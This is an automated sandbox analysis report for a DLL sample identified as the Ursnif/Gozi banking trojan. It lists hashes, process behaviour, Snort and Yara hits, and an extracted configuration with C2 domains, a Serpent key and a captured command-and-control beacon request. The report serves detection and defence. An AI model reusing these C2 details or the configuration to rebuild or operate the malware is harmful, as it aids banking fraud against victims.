Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report c36.dll

Overview

General Information

Sample Name:c36.dll
Analysis ID:446420
MD5:c36ab737db2b6d11fb1f443f8117a7fa
SHA1:e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
SHA256:181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
Tags:dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c36.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 1636 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1844 cmdline: rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1488 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1632 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Division MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5520 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2616 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5468 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3008 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 15 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000003.310307247.0000000001130000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Source: c36.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49729 -> 40.97.128.194:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49729 -> 40.97.128.194:80
            Source: Joe Sandbox ViewIP Address: 40.97.128.194 40.97.128.194
            Source: global trafficHTTP traffic detected: GET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
            Source: msapplication.xml0.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.24.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: outlook.com
            Source: msapplication.xml.24.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.24.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.24.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.24.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.24.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.24.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.24.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.24.drString found in binary or memory: http://www.youtube.com/
            Source: {6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.drString found in binary or memory: https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1996 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1A44 NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A23A5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAB1A5 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01185A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118B1A5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A2184
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA3EE1
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA888E
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAAF80
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CA260
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CD1F0
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E8559
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DEDC4
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DC5EB
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CDA30
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E7AD1
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E8015
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D68E0
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1EA1BF
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1C99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01183EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CA260
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CD1F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E8559
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1DEDC4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1DC5EB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CDA30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E7AD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E8015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D68E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1EA1BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1C99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CA260
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CD1F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E8559
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1DEDC4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1DC5EB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CDA30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E7AD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E8015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D68E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1EA1BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1C99A0
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E1D9D10 appears 49 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E1D9D10 appears 98 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E1DBFE0 appears 48 times
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
            Source: c36.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: classification engineClassification label: mal72.troj.winDLL@17/18@3/3
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1632
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMPJump to behavior
            Source: c36.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
